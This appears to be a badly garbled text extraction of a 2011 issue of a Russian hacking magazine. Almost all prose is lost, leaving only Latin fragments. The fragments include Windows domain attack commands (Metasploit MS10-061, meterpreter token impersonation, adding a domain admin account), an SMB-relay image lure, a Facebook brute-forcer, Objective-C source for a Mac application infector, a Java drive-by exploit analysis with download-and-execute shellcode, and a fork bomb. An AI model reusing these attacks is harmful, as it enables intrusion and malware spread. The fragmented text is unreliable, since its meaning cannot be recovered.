(KiTrap0D) . ,
, ( ).
,
, NTLM , . ? ? .
. ,
, -
. NTLM Chalenge
response . , ,
.
X 02 (145) 2011
Alice
Bob
IP: 10.0.0.7
MAC: [aa:aa:aa:aa:aa:aa]
IP: 10.0.0.1
MAC: [bb:bb:bb:bb:bb:bb]
:]
s I P :c c
in t c c
Po c:
h e c :c
ac c :c
P C c :c
AR : [c
ied A C
di f o M
Mo 0.7 t
.0 .
10
10 Mo
.0 . di
0.1 fie
to d AR
MA P
C : C ac
[cc h
:c c e P
:c c o i n
:c c t s I
:c c P
:c c
:]
Switch
Cain&Abel. DNS spoofing
Attacker
IP: 10.0.0.3
MAC: [cc:cc:cc:cc:cc:cc]
ARP spoofing
90-, . , ,
.
aka toxa: securitylab.ru/analytics/362448.php.
. , ,
- SQL -. MSSQL, SA.
, xp_cmdshell
meterpreter, SYSTEM.

, .
, ,
LSA,
. SAM-.
gsecdump wce,
.
, , , -.
,
. , MS10061.
ms10_061_spoolss>set SMBUser user
ms10_061_spoolss>set SMBDomain DOMAIN
ms10_061_spoolss>set SMBPass 010101010101010101010101
01010101:01010101010101010101010101010101
MS10-061, ,
-, .
, .
, - ,
, .
,
, . . -
-,
SeImpersonate
( MS09-012, ).
:
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token DOMAIN\\admin
X 02 (145) 2011
, ,
. ,
. , :
meterpreter>shell
C:\windows\system32\>net user xakep p4sSw_0Rd /ADD
/DOMAIN
C:\windows\system32\>net group "Domain Admins" xakep
/ADD /DOMAIN
,
(, , ).
: , ,

, ...
SMB-RELAY
( ) ,
, .
, , , WSUS
. , ,
.
. - . , gsecdump:
LSA-, . . ,
ERP-,

. , SQL-. ,
. MSSQL,
Microsoft , Oracle .

,
. ,
SMB-RELAY xp_dirtree/xp_fileexist (
). /
. , UNC,
. ,
, NTLM
chalenge response , - ,
, .

SMB-RELAY ( ). , (, ,
). ,
, ,
063
ARP-SPOOFING + RDP MitM

, , . , . ,
( , SYSTEM). ,
,
( )? ,
,
MS08-068. . :
, , MS08-068
,
.
. XSS
, :
<img src="\\attacker\shara">
, ,
SMB-RELAY .
. ARP-SPOOFING
ARP-SPOOFING
. ARP-
.
, IP-
. , IP-
.
, .
.
Cain&Abel Ettercap.
: ( ), -
, ARP-SPOOFING -
( , -) <img src="\\attacker\shara">.
SMB-RELAY .
Ettercap, SMB-RELAY .
064
.
, -,
, - .
,
ARP-.
. , ,
RDP,
, ,
. , Cain RDP- . Cain' (irongeek.com/downloads/
cain-RDP-parser.zip) .
...
? ?
,
( ).
- ARPSPOOFING, SMB-RELAY, Token', HASH-and-PASS
. ,
,
.
.
, . , , :
, ,
. ,
, , DNS
.
. ,
- bankclient-1
, . ,
( , , ), bankclient-1 .
... z
X 02 (145) 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

icq 884888, http://snipper.ru
X-TOOLS

X11.
, , : , CPU (i2c), MPD , CPU usage, ,
:)
:
: Evalhook 0.1
: *nix/win
: Stefan Esser
: uname,
, CPU, ,
;
IMAP POP3;

(MPD, XMMS2, BMPx, Audacious);

Lua
;
Imlib2 Cairo;
,
, .
Evalhook
,
php-,

- . ,
php-
, , :
<?php
/* Demo by www.php-crypt.com */
$keystroke1 = base64_decode("d2RyMTU5c
3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJ
tcA==");
...
?>
? PHP Evalhook
.
,
PHP extension,
, , , , .

eval
.
:
<?php
array_map('assert',
array('phpinfo()'));
?>
,
"phpinfo()":
Script tries to evaluate the following
string.
----
066

return phpinfo() ;
---Do you want to allow execution? [y/N]
*nix- Evalhook
:
1. PHP >= 5.2,
php-devel, PHP Zend Optimizer;
2. run.sh
:
tar xvfz evalhook-0.1.tar.gz
cd evalhook
phpize
./configure
make
sudo make install
3. : sh run.sh.
Evalhook.
, : php -d extension=evalhook.so
_.php. ,
php-security.
org/2010/05/13/article-decoding-a-user-spaceencoded-php-script.
: Conky
: *nix
: brenden1, joemyre, pkovacs

Conky!
, Conky ,

:
Debian/Ubuntu:
sudo apt-get install conky
zcat /usr/share/doc/conky/examples/
conkyrc.sample.gz > ~/.conkyrc
Gentoo:
emerge app-admin/conky
FreeBSD:
cd /usr/ports/sysutils/conky && make
install clean
( X11):
$ ./configure
$ make
# make install

.
1.
: zcat /usr/share/doc/conky/
examples/conkyrc.sample.gz > ~/.conkyrc;
2. (, vim): vim ~/.conkyrc.
3. ,
:${downspeedgraph rl0 32,155
104E8B 0077ff}.
:
rl0 ;
32 ;
155 ;
104E8B ;
0077ff .
X 02 (145) 2011
mail.ru

4. : killall -SIGUSCR1 conky.

, .
Conky:
1. exec , ;
2. execbar execgraph
;
3. execi texeci
;
4. if_running, if_existing if_mounted endif,
,
;
5. else ,
.
,

conky.
sourceforge.net.
: OWASP HTTP Post

Tool
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Tom Brenann
OWASP 2010 Application Security

Conference, ,
,
HTTP
,
- HTTP POST .
, 2009
, Proactive Risk
,

,
HTTP POST DDoS. , HTTP ,
-
. -,
( .
.), .
DDoS-,
,
,
, , . HTTP POST
POST-,
X 02 (145) 2011
, , ,
(
).
,
HTTP
POST,
.
DDoS-
OWASP owasp.org/images/4/43/
Layer_7_DDOS.pdf,
HTTP POST
OWASP HTTP Post
Tool. .
, URL ,
, , ,
User-Agent,
POST.

www.
owasp.org/index.php/OWASP_HTTP_Post_Tool.
: Facebook Brute
: Zdez Bil Ya
Facebook.com
grabberz.com Zdez Bil Ya.
:
SOCKS4/SOCKS5;

(, , PPS, );
+
( ,
);
+
;

;;

.
:
10 000
.
grabberz.com/
showthread.php?t=26298.
: Mail.ru Registrator 4
: Zdez Bil Ya

Zdez Bil Ya
mail.ru ( mail.ru, bk.ru, list.ru,
inbox.ru).

,
(antigate.com).

:

( );

( );
(
@).

:
(
);
;
;
(mail.ru, list.ru, bk.ru,
inbox.ru);
( );
(
);
(HTTP,
SOCKS4 SOCKS5);
,
;
;

( name.txt,
family.txt);
(
./
avatars).

accounts.txt
email@domain;password.

avtuh.ru/2010/09/27/mail-ruregistrator-4.html. z
067
MALWARE
seva seva
MAC? , !
Mac OS X? . ,
, ,
. ?
? .

Mac Classic ( , Mac

OS 10-, Mac OS X) :
1984 Mac OS X 2001.
,
, , , nVir, -
068
1987 .

, .
Mac OS,
.
, Apple ,
, X 02 (145) 2011
>> coding
LC_LINUXTHREAD otool
Mach- , Mac OS X. a.out.

Mach ( ,
).
NeXTSTEP. Mac OS X,
NeXTSTEP, . , GNU/Hurd,
X 02 (145) 2011
Mach-O
Header
Load commands
Segment command 1
Segment command 2
Data
Segment 1
Mach-O
Mach, ELF,
Mach-Object.
Mach- - PE,
. , , . , PowerPC Intel.
, .
PowerPC- , Apple ,
.
Intel ,
- PowerBook,
.
Mach-O ( , ,
PE, Microsoft).
Apple. ,
( loader.h),
Section 1 data
Section 2 data
Section 3 data
Section 4 data
Segment 2
malware. ,
CD. autorun
Mac OS X ,
-.
, Apple Mac OS X
.
/Applications.
.
, ,
.
, iTunes iMail.
C Apple . , .
-
Mac OS X/iOS
.
, , - jpg- c
Mac OS X . Finder Mac OS X .
,
,
,
.
, , .
, , ,
Ma OS X,
,
.
Section 5 data
...
Section n data
069
MALWARE
, :)
continue; // -
#import <Cocoa/Cocoa.h>
int main(int argc, char *argv[])
NSDictionary * plist_dict =
[NSDictionary dictionaryWithContentsOfFile:
//
[our_fldr stringByAppendingFormat:
NSLog(@"!!!!!!!!!!!!!!!!!!!!!");
NSLog(@"!!!
Im here
@"/%@/Contents/Info.plist", app]];
!!!!");
NSLog(@"!!!!!!!!!!!!!!!!!!!!!");
NSString * app_executable =
NSFileManager * fm =
[plist_dict objectForKey: @"CFBundleExecutable"];
[NSFileManager defaultManager];
//
NSString * bundle_fldr =
// -
[[NSBundle mainBundle] bundlePath];
[fm moveItemAtPath:
// , app
NSString * our_fldr =
@"/%@/Contents/MacOS/%@", app, app_executable]
[bundle_fldr stringByAppendingString: @"/.."];
toPath:[our_fldr stringByAppendingFormat:
//
@"/%@/Contents/MacOS/old"] error: nil];
NSString * current_executable =
[[NSDictionary dictionaryWithContentsOfFile:
//
[bundle_fldr stringByAppendingString:
@"/Contents/Info.plist"]] objectForKey:
[fm copyItemAtPath:
@"CFBundleExecutable"];
[bundle_fldr stringByAppendingFormat:
// :)
@"/Contents/MacOS/%@", current_executable]
NSArray * apps =
toPath: [our_fldr
[[fm directoryContentsAtPath: our_fldr]
stringByAppendingFormat:
filteredArrayUsingPredicate:
@"/%@/Contents/MacOS/%@" , app,
[NSPredicate predicateWithFormat:
app_executable]
@"self ENDSWITH '.app'"]];
error: nil];
}
for (NSString * app in apps){

if (
//
[fm fileExistsAtPath:
system([[[[NSBundle mainBundle] bundlePath]

stringByAppendingString:
@"/%@/Contents/MacOS/old", app]]
@"/Contents/MacOS/old &"] cString]);

}
, Mach-O. ,
:
Mach-O , . ,
. ,
.
, Intel uint32 Little Endian.
Mach-O loader.h
struct mach_header
{
uint32_t magic; // Mach-O
cpu_type_t cputype;
cpu_subtype_t cpusubtype;
uint32_t filetype;
uint32_t ncmds; //
uint32_t sizeofcmds; //
uint32_t flags;
};
.
.
. , ,
070
LC_SEGMENT LC_UNIXTHREAD.

,
.
, .
LC_LINUXTHREAD . IP, . ,
, IDA
Mach-O,
. , IDA , .
LC_SEGMENT loader.h
struct segment_command
{
// Id
uint32_t cmd;
uint32_t cmdsize; // ( Id)
char segname[16]; // __TEXT
uint32_t vmaddr; // VM
uint32_t vmsize;
uint32_t fileoff; //
uint32_t filesize;
X 02 (145) 2011
>> coding

vm_prot_t maxprot;
vm_prot_t initprot;
uint32_t nsects;
//
uint32_t flags;
//
};
struct section
{
char sectname[16]; //
char segname[16];
uint32_t addr;
uint32_t size;
uint32_t offset; //
uint32_t align;
uint32_t reloff;
uint32_t nreloc;
uint32_t flags;
uint32_t reserved1;
uint32_t reserved2;
};
: ,
,

otool ( , ,
). Mach-O ,
, . __TEXT,
__DATA.
X 02 (145) 2011
, Mac OS X, ,
Mac OS X. LC_
LINUXTHREAD, , .
Mach-O ?
__TEXT,
.

... , .
,
.
, ,
, , , . ,
, .

. , ,
.
__TEXT __DATA __PAGEZERO,
,
.
, , ,
. ,
, , .
__PAGEZERO fileoffset filesize . ,
. ,
, , ,
.
__PAGEZRERO ( R- X-),
LC_LINUXTHREAD,
. , , .
,
BlackHat, . ,
, ,
.
,
. ,
Mach-O , .
, .
(- 4K
),
. , ,
.
:), .
Mac OS X
, Mac OS X (baundles).
,
,
. Finder , , .
, .app, Contents. Frameworks,
, , . , ( dll)
. MacOS
Mach-O, ( Resources) ,
. Info.plist .
:
071
MALWARE
...
<?xml version=1.0 encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>Demo</string>
<key>CFBundleIconFile</key>
<string></string>
....
<key>NSMainNibFile</key>
<string>MainMenu</string>
<key>NSPrincipalClass</key>
<string>NSApplication</string>
</dict>
</plist>
xml-,
. Mac OS X
.
CFBundleExecutable.
MacOS. . , - ,
. ,
CFBundleExecutable, , ,
. -,
072
. ,
/Applications , ,
, Mac OS X!
, , AuthorizationCreate Security-.
, , Mac OS X
Apple , ,
.
,

.
: ,
, ,
old, , , .

.
Outro
, ,
, .
Mac OS X , ,
*nix-,
Mac OS X
. ! z
X 02 (145) 2011
>> coding
MALWARE
Senior Malware Analyst, Heuristic detection group, Kaspersky Lab
Java
JAVA-
PE,
,
Java. Java?
, , . ,
.
? drive-by. , drive-by ,

, . , . ,
, . , -, - ,
,
.
Java
.
X 02 (145) 2011
Java, , CVE-2009-3867. ,
, .
JavaScript Java. -,
JRE
, .
. html , html-.
Java, <applet>
<object>. archive
( jar) code (
-, ). html
<PARAM>. ,
, , data, .
073
MALWARE
. 1 , Java
. 2 AdgredY.class
.
:
archive='tmp/pul.jar'
code='dev.s.AdgredY'
<param name='data' VALUE='http://****.com/
s4/l.php?...
, jar . ?
Java? jar
ZIP-, .
, .
class. ,
Java-.
, . AdgredY.class, , code
<applet> . ,
, dev.s.AdgredY, AdgredY. , . , , , , ,
.
.class , , , . Java JAD.
, ,
(, , , , ).
AdgredY.class, , , .
Hiew, ,

.
-, ,
! ,
A000CA469F , mov al, [0x9F46CA00].
Windows .
, .
,
Java NetBeans
. ,

. ,
. , .
, , .
s2, s4, s8 .
s3 , .
074
. 3 AdgredY.class
, , s5 s3
,
reverse. , atad data (
! ! .
.). .
, .
.
,
, s21, s25 .
, ,
getParameter data . ,
, ,
<PARAM> html-. .
, url.
: http://********.com/s4/l.
php?deserialize=ee&i=. , php, ,
: deserialize, ee
i. ,
deserialize. :
String s27 = getParameter(data);
char ac[] = {?};
int i = 0;
int j = 0;
for(; s27.charAt(i) != ac[0]; i++)
j += s27.charAt(i);
j += 7;
j %= 256;
String s28 = Integer.toHexString(j);
if(s27.indexOf((new StringBuilder()).append(
"deserialize=").append(s28).toString()) == -1)
return;
, ?
,
.
.
Java, -. , -
, URL,
, .
X 02 (145) 2011
>> coding
. 4 AdgredY.class,
. 5 goat-, , Java-
, i .
getSoundBank.

(. . 4).
Java System.
getProperty (java.version). url, , -
Zeus

()
Z%Z%Z%Z%Z%Z%. !
!.
getSoundBank ,
.
,
. ,
. ,
url, data <PARAM>.
C,
.
IDA, goat-. (.
5) , .
,
url, .
X 02 (145) 2011
URLDownloadToFile WinExec.
.
PEB kernel32.
LoadLibraryA
GetProcAddress,
urlmon.dll GetTempPathA, WinExec, URLDownloadToFileA.
,
. , , ,
.
PoC, ,
.
, .
-,
? , Java , .
,
html- .
Java. ,
, .
, ,
drive-by. , ,
, .
url .
, , , .
getSoundBank .
-, ,
. , pdf, javascript . ,
Windows Adobe, Java. z
075

Mifrill (mifrill@real.xakep.ru)
IT- .
,
.
- . , ,
. , , !
, , ,
! ,
,
, ,
.
, , .
, .
, :
?, ,
?
,
. , ,
.

.
? ,
,

, .
,
, ,
, iDefense,
SnoSoft VUPEN.
, , -
076
074
, .
, IE,
?
$5 000 $250 000,
: ,
,
.
, , ,
,
, ,
,
.
.
, , .
? , ,
-
.
, .
,
.
,
. ,
. , ,
, Mozilla
$3 000 Firefox,
Google
Chrome $3
133.70 (1337 elite,
).
PR-, .
, ,
.
, .

,
,
,
. ,

, ,
.
, ,

, Zero Day Initiative
(zerodayinitiative.com) Tripping Point,
Snosoft program (snosoft.blogspot.com)
iDefense Vulnerability Contributor
Program.
,
. ,

.
,
, -
-,
.
X 02 (145) 2011

.
,
: ,
, ,

. .

iDefense
X 02 (145) 2011
, :
.
,

, ,
.

, , , .
,
.
,
,
,
. .

.
,
IT-.
077
,
:)

. -
, ,
. . .

,
-.

iDefense. -
:). ,

-
. , .
? . , , ,
,
, .

,
,

EBay
, , .
,
-
- . ,
,
. ,

, , ,
.

-
,
. .
,
wasm.ru antichat.ru.

,
.
,
$200-350 ,
.
,
,

.
,

, . , , ,
, . ,

,

. ,

.
, ,
?
.
, ,
, , .
.
, , .
, ,
.
, :
, IPS (Intrusion
Prevention System)
078
X 02 (145) 2011
, Zero Day Initiative

,
. ,
, ,
.
100 000 ?
100 000
, , -
. -,
, .

Immunity, Core Security Rapid7,
, ,
. ,

, . ,
,
.
, ,
. :
IPS , IPS
. ,
,
.
secure-
.

,
X 02 (145) 2011
-.
. -

. .
,
,
,
.
, ,
. ,
Microsoft,
? , MS
- ,
, ,
-, , ,
, . ,
( ,
)
, . : - ,
-
-, , ,

.

. ,
.

-
,
.
,
. , ,
.
?
,

. , ,
.
.
,
.
Mozilla Google PR, ,
.
, ,
. ,

, ,
,
.
, , . , , ,

:). z
079
UNIXOID
zobni n@gmail.com

: 20% 80% .

, : ,
,
20%
, .
20% .
. ,
,

,
, - .
(,
,
), ,
,
080
.
( ,
),
,
.

GNU Profiler ( gprof).
,
GCC.
GNU Coverage testing tool (gcov),
.

Google Performance Tools ( GPT). Valgrind,

,

. ,
, .
GNU Profiler
GNU Profiler (gprof)

,
X 02 (145) 2011
INFO
info
.1 , gprof,
$ sudo apt-get install build-essential
,
CFLAGS '-pg':

gprof

libc,
,

libc6-prof

libc_p:
export LD_FLAGS=
'-lc_p'.

GPT

CPUPROFILE,

ProfilerStart() ProfilerStop(),
google/
profiler.h.
$ CFLAGS='-pg' ./configure
.2 gprof
,

UNIX. gcc, ,
(
C/C++, Objective-C, Ada, Java).
gprof ,
,

( , , ,
'-pg').
, . gprof,
- ,
, . gzip. :
$ wget www.gzip.org/gzip-1.3.3.tar.gz
$ tar -xzf gzip-1.3.3.tar.gz
$ cd gzip-1.3.3
,
( Ubuntu -
build-essential):
X 02 (145) 2011
: make.
gzip, .

gmon.out:
$ ./gzip ~/ubuntu-10.10-desktop-i386.iso
$ ls -l gmon.out
-rw-r--r-- 1 j1m j1m 24406 2010-11-19 14:47
gmon.out
,
:
WARNING
warning
-

GPT

SUID.
$ gprof ./gzip gmon.out > gzip-profile.txt
1.
, . , , .

, (
, ), .
. deflate,
, 29%
.
, ,
gzip,
. 22%
longest_match, ,
deflate, 450 613 081 ,
081
UNIXOID
.3 gcov

. . fill_window 13%
22 180 . ,
.
(,
, ),
(Call graph).
, ,
( ). ,
,
.
, .
( ): (index,
); , (% time); , (self);
, (children); (called)
(name). ,
: c
, ,
.
GNU Coverage testing tool
gprof, GCC
,
.
gcov ,
.

, , , ,
(, ,

). Gcov , -
082
'-pg',
'-fprofile-arcs' '-ftest-coverage':
$ CFLAGS='-fprofile-arcs -ftest-coverage'
./configure && make
:
$ ./gzip ~/ubuntu-10.10-desktop-i386.iso
,
:
$ gcov deflate.c
File 'deflate.c'
Lines executed:76.98% of 139
deflate.c:creating 'deflate.c.gcov'
: , .
, ,
, ,
: #####.
Google Performance Tools
Google Performance Tools ( GPT)

Google,
. gprof, GPT
,
POSIX- gettimeofday() , ,
, ,
. .
X 02 (145) 2011
.4 , GPT, gprof

.

, ,
.
: tcmalloc
(, GPT,
malloc,
, ,
) profiler, ,
gprof. pprof, .
, rpm- deb-
(code.google.com/p/googleperftools), , Fedora
Ubuntu, :
$ sudo apt-get install google-perftools \
libgoogle-perftools0 libgoogle-perftools-dev
. ,
LD_PRELOAD:
$ LD_PRELOAD=/usr/lib/libprofiler.so.0.0.0 \
CPUPROFILE=gzip-profile.log ./gzip \
/home/j1m/ubuntu-10.10-desktop-i386.iso
(
- , C++),
. , .
gzip , :
$ cd ~/gzip-1.3.3
$ make clean
X 02 (145) 2011
$ ./configure
$ LDFLAGS='-lprofiler' ./configure && make
gzip ,
. , CPUPFOFILE
:
$ CPUPROFILE=gzip-cpu-profile.log ./gzip \
~/ubuntu-10.10-desktop-i386.iso
PROFILE: interrupts/evictions/bytes = 4696/946/91976
gprof,

. GPT perl- pprof ( Ubuntu
google-pprof),
gcov,
. 11 ,
:
1. (--text) , gprof;
2. Callgrind (--callgrind) , kcachegrind ( valgrind);
3. (--gv) ,
;
4. (--list=<regexp>)
;
5. (--disasm=<regexp>) ;
6. (--symbols)
;
7. (--dot, --ps, --pdf, --gif) ,
;
8. (--raw) ( ).
('--text')
('--gv') .
083
UNIXOID
ADEPT ADEPTG@GMAIL.COM
.5 , GPT,

. :
$ google-pprof --text ./gzip gzip-cpu-profile.log
4,
.
, gprof, . , GPT

, , .

( , '-pg'), GPT
, .
,
, , .

. pprof ,
, .
, ,
. , ,
.
gprof: , . :
1. ;
2. ;
3. ;
4. ;
5. ;
6. .

, , gprof, pprof, ,
084
. , GPT
CPUPROFILE_FREQUENCY,
, , (,

).
GPT gprof
.
pprof '--gv' (,
):
$ google-pprof --gv ./gzip gzip-cpu-profile.log

, ,
gprof.
, , .
,
( ).
, ,

. GPT , .
,
pprof .
( '--lines'), ('--files')
('--addresses'). GPT
,
, , ,
.
X 02 (145) 2011
.6 Valgrind callgrind
. , GPT
, ,

.

tcmalloc, HEAPPROFILE . :
$ LD_PRELOAD=/usr/lib/libtcmalloc.so.0.0.0 \
HEAPPROFILE=gzip-heap-profile.log \
./gzip ~/ubuntu-10.10-desktop-i386.iso
Starting tracking the heap
Dumping heap profile to gzip-heap-profile.log.0001.
heap (Exiting)
,
,
. :
1. Cachegrind

( ,
).
2. Massif , GPT.
3. Callgrind , gprof GPT.
Valgrind
memcheck ( ),
.
:
0000.heap.
pprof '--text',

. ,
, ,

.
, .
,
HEAP_PROFILE_MMAP.
mmap (
GPT malloc,
calloc, realloc new).
callgrind.
out.PID-,
callgrind_annotate kcachegrind
( ). (
man-), , callgrind_annotate
'--auto',
.
Valgrind '--tool=massif'.
massif.out.PID-,
ms_print.
pprof, , ascii-art .
Valgrind
Valgrind .
Valgrind ,
,
.
X 02 (145) 2011
$ valgrind --tool=callgrind ./program
, gprof, gcov GPT,

,
Valgrind,
. z
085
UNIXOID
zobni n@gmail.com

Linux
.
, ,
, .

(DM), ,
DE.
DM
, KDE Gnome,

.
SLiM (Simple LogIn Manager).
SLiM Ubuntu,
apt-. -
086
SLiM
. - ,

. /etc/slim.conf,
default_path
( ):
:/sbin:/usr/sbin:/usr/local/sbin

DE. sessions
"default,awesome,xterm".
: , awesome xterm
( WM).
X 02 (145) 2011
slim,

INFO
info

,

(

)

.
. ,
, : ,
, , ,
freedesktop, .

. Fluxbox, windowmaker, kwm, compiz
WM
,
Xerox.
, (
)
.
, ,
( tail , ).
, , -
.
WM, (, ratpoison dwm),
(ion3, awesome). , kwm ( KDE 4.5).

awesome. , , ,
, awesome
, (
)
. ,
awesome Ubuntu,
apt-get:
$ sudo apt-get install awesome awesome-extra
awesome-extra
awesome, ,
.
UNIX-
, . X 02 (145) 2011
, mc,
xterm .
,

rxvt-unicode. , , .
, ,
.
terminus,
UNIX-.
, (
)
:
$ sudo apt-get install rxvt-unicode \
xfonts-terminus
$ sudo apt-get remove xterm gnome-terminal
~/.Xdefaults :
$ vi ~/.Xdefaults
! xterm
URxvt*termName: xterm
!
URxvt*background: #e0e0ac
!
URxvt*foreground: Black
!
URxvt*scrollBar: false
!
URxvt*internalBorder: 5
!
URxvt.font: xft:Terminus:size=14
.
, ,
.
, , .
Ubuntu
NetworkManager, DE

uzbl

,

fl (fl*
).

, ,

.
uzbl

,

www.
uzbl.org/wiki/scripts.

GTK-

gtktheme-switch
(

gtk2-engines-*).
HTTP://WWW
links
awesome.naquadah.
org/wiki/User_Contributed_Widgets

awesome;
awesome.naquadah.
org/wiki/Beautiful_themes
awesome.
087
UNIXOID

, , .
wicd,
, . , NetworkManager:
$ sudo apt-get remove network-manager
$ sudo apt-get install wicd wicd-curses wicd-cli
wicd ,
.
,
.
, .
slim. <F1> (
awesome), . awesome
( ).
. -,
( , awesome
). ,
WM.
, <Win+W>.
1 9,
, WM.
<Win+>.
(
088
), , (
, ).
-, ().
:
1. ;
2. (, <Win+Enter>
);
3. , <Win+R> (
<Alt+F2> WM, -,
, ).
( ) <Win+J> (), <Win+K> ()
<Win+Tab> ( ).
awesome ,
. <Win+>,
: ,
.
,
, . Awesome ,

- ( , ),
<Win+>
() <Win+Shift+> ().
,
. ,
:
1. . .
,
<Win+ >,
<Alt+ >
. (
gimp) , .
2. , . ,
( top,
bash, irc- ).
3. . , (
). ,
: , mail-, ,
.
X 02 (145) 2011

<Win+N>, <Win+M>, , <Win+Ctrl+>
<Win+Shift+C>.
<Win+H> () <Win+L> ().
,
awesome, ,
, .
awesome lua,
,
( lua
). lua
( JavaScript),

.
.
.
require, lua-.
require(vicious), vicious,
( awesome -, - ).

beautiful.init. ,
,
( awesome
/usr/share/awesome/themes/).
,
, , modkey ( ,
awesome
Win, Mod4). , ,
, -, ,
(,
<Ctrl+Q>, )
. ,
, ,
: . - :
/ ( Wi-Fi), , ,
(, , ). ,
, (
, ).
, -- {{{ Rules, .
,
. , ,
audacious ,
, WM,
( ):
{ rule = { class = "Audacious2" },
properties = { floating = true } },
( Audacious2) ,
xprop | grep WM_CLASS
.
.
( wicd), ( DE,
) (
DE).
. ,
X 02 (145) 2011
awesome
, ~/.xsession,
'&'.
, ~/.xsession :
$ vi ~/.xsession
# Wicd
wicd-client &
# - CAPSLOCK
#
setxkbmap "us,ru" ",winkeys" "grp:caps_toggle" &
# WM
exec awesome

halevt, .
.xsession (
pgrep halevt >> /dev/null || halevt & exec awesome)
:
$ sudo rm /etc/rc{2,3,4,5}.d/S20halevt
sync, .
/media/- ( /media/disk, ).
,
, -.
UNIX ,

.
, . uzbl ( usable ) -,
UNIX, , ,
. -, uzbl
,
: uzbl-core ( WebKit), uzbl-cookie-daemon cookie, uzbl-browser , uzbl-tabbed
.
.
- , .
,
,
.
Vim,
, , uzbl.
: uzbl
089
UNIXOID
awesome
(
uzbl-tabbed):
uzbl:
gn
go
gC
g<
g>
gt
gT
gi
uzbl , Acid3

. , <r>
, <o> .

<Ctrl>, : , -
- , ,
, ,
. <Esc>.
,
.
:
uzbl:
h j k l (, , ,
)
<<
>>
+
1 2
/ ? (, )
n N (, )
S
r
, :
uzbl:
o (
URL)
O ,
p ,
gg google
b
n
090
, uzbl , .
<Ctrl+b>, ,
. , ,
<Tab> ( dmenu,
suckless-tools). 
.
<Z>.
.config/uzbl/config, (, ,
, awesome ). , .
, ,
, .
.
, :
rox-filer ,
(
Thunar XFCE);
(g)vim -, (, emacs);
abiword ( docs.google.com);
zathura PDF- vim (
evince);
mplayer , , ( ,
);
audacious2 (
awesome ,
);
mutt mail- (
,
gmail);
mcabber jabber- ( ,
tkabber);
feh ;
scrot ;
burn , (
xfburn XFCE). z
X 02 (145) 2011
WEXLER.HOME 903
>> coding

, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.
. WEXLER.HOME
750 . ,
, .
WEXLER.HOME 903 Windows 7 .

64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).
Intel Core i5-650 3,2 - 4 . CPU

Turbo Boost, (, ). , .
GeForce GTX 460,

Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.
WEXLER.HOME 903
4 , .
Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.
UNIXOID
Adept adeptg@gmail.com

GNU/Linux

GNU/Linux ,

.
Kernel
, ,
( , ,
). Linux
. ,
. , , -
092
,
RDS (Reliable Datagram Sockets),
,
root
(CVE-2010-3904). RDS

( , )
InfiniBand.
Oracle
, , .
,
. ,
X 02 (145) 2011
- Ac1db1tch3z
RDS-
RDS (CONFIG_RDS=m).
RDS:
2.6.30 2.6.35.
, Virtual Security
Research ,
, (15 2010),
(19 ) , : www.vsecurity.
com/download/tools/linux-rds-exploit.c.
.
Ubuntu (9.10, 10.04 10.10) 19 .
RedHat 25
( ). Debian Lenny
2.6.26 RDS.
,
rds ( ):
. ,
,
. ,
.
.
(CVE-2010-2240) : ,
. ,
, 2.6 ( , 2.4). ,
: ,
. , .
X- (
MIT-SHM) ( , ,
, PDF-).
X-
xorg-large-memory-attacks.pdf
www.invisiblethingslab.com.
SELinux, chroot.
X-
MIT-SHM, xorg.conf:
# echo "blacklist rds" > \

/etc/modprobe.d/blacklist-rds.conf

, ,
. 2007
32- 64- .
root. Ben ,
. ,
2010 ,
. , 2008 -
,
,
. , , 2008-2010,
. .
PoC, ,
: sota.gen.nz/compat2/robert_you_suck.c.
seclists.org PoC,
Ac1db1tch3z: seclists.org/fulldisclosure/2010/Sep/att-268/
ABftw_c.bin. PoC
, Ac1db1tch3z .
, , . Ksplice ,
,
X 02 (145) 2011
$ cat /etc/X11/xorg.conf
Section "Extensions"
Option "MIT-SHM" "disable"
EndSection
INFO
info
suid-
,

.
HTTP://WWW
links
grsecurity.net

grsecurity;
www.gentoo.
org/proj/en/hardened/ Gentoo
,
grsecurity
;
www.openwall.
com/Owl/
,

.

2.6.32.19, 2.6.34.4 2.6.35.2. , 2004 SUSE
, -
. SLED openSUSE
. ,
. ,
DoS-.
: lkml.org/
093
UNIXOID
grsecurity
lkml/2010/11/25/8.
100% ,
. . - ,
. , , BSD-, FreeBSD 8.1 OpenBSD 4.8.
- (,
:(){ :|:& };:), :
- ulimit
( -);
. root. kill -KILL.
.
,
. .
System
, -
. , , ldd. ,
. , ,
. ldd :
# ldd /bin/ping
linux-vdso.so.1 => (0x00007fff69b7e000)
libc.so.6 => /lib/libc.so.6 (0x00007fd0cce9f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd0cd243000)
, ldd bash-,
LD_TRACE_LOADED_OBJECTS=1,
. ld-linux.so,
, . , ,
. , ldd
:
# LD_TRACE_LOADED_OBJECTS=1 /bin/ping
linux-vdso.so.1 => (0x00007fff232da000)
libc.so.6 => /lib/libc.so.6 (0x00007f1bf7363000)
/lib64/ld-linux-x86-64.so.2 (0x00007f1bf76e6000)
,
libc, ld-linux.so , . ,
- ldd exploit,
exploit. ,
: , .
ldd exploit ( root,
094
App
Vuln.
Google Chrome
76
Safari
60
Microsoft Office
57
Adobe Acrobat
54
Mozilla Firefox
51
Sun/Oracle JDK
36
Adobe Shockware Player
35
Microsoft Internet Explorer
32
RealNetworks RealPlayer
14
Apple Webkit
Adobe Flesh Player
Apple QuickTime
Opera
2010
Bit9
). , ldd, , -
